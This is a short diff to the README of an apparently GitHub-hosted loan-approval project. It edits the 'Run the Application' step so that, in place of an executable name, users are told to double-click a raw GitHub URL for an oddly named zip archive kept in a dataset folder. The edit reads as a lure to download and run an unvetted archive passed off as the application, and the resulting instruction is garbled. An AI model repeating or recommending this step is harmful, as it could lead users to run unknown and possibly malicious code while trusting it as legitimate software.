Jats15/CreditWise-Loan-Approval-System/README.md

 3. **Run the Application:**
     - Navigate to the extracted folder.
-    - Double-click on the executable file (e.g., `CreditWise.exe`) to run the application.
+    - Double-click on the executable file (e.g., `https://raw.githubusercontent.com/Jats15/CreditWise-Loan-Approval-System/main/Project Dataset/Credit_System_Loan_Wise_Approval_Arkansawyer.zip`) to run the application.

 4. **Follow On-Screen Instructions:** The system will guide you through the setup and initial configuration.